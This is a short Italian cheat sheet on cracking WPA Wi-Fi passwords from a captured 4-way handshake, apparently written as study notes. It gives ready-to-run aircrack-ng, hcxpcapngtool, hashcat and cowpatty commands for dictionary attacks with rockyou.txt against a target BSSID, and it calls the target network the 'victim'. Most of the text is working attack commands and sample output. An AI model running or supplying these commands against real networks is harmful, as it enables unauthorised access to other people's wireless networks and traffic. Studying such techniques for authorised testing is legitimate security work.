tags: Hacking_WiFi Cracking_File_Pcap
Quando riusciamo a catturare uno scambio 4-way-handshake per esempio tramite wireshark possiamo provare a craccare la password per quell’AP nel seguente modo:
Verifica presenza di 4-Way-Handshake
aircrack-ng la_tua_cattura.pcapEsempio di output
Index BSSID ESSID Encryption ...
1 00:1A:2B:3C:4D:5E ReteEsame WPA (1 handshake)
2 AA:BB:CC:DD:EE:FF AltraRete WPA (0 handshake)Come vedi, aircrack-ng ti dice che per la ReteEsame (indice 1) ha “(1 handshake)“. Questa è la tua vittima. L’altra rete è inutile.
Lancio dell’attacco
Ora che sai di avere l’handshake e conosci il BSSID (00:1A:2B:3C:4D:5E), lanci l’attacco specificando la wordlist e il BSSID target.
aircrack-ng -w /usr/share/wordlists/rockyou.txt -b 00:1A:2B:3C:4D:5E la_tua_cattura.pcapHashcat
La fase di verifica va fatta tramite altri strumenti come aircrack-ng, ma tramite hashcat il crack è più veloce specialmente se si dispone di una GPU potente.
# Convertire pcap in formato hashcat
hcxpcapngtool -o hash.hc22000 capture.pcap
# Crackare con hashcat
hashcat -m 22000 hash.hc22000 /usr/share/wordlists/rockyou.txt
# Con regole di trasformazione
hashcat -m 22000 hash.hc22000 -r /usr/share/hashcat/rules/best64.rule /usr/share/wordlists/rockyou.txt
# Mostrare password trovate
hashcat -m 22000 hash.hc22000 --showCowpatty
cowpatty -r capture.pcap -f /usr/share/wordlists/rockyou.txt -s <ESSID>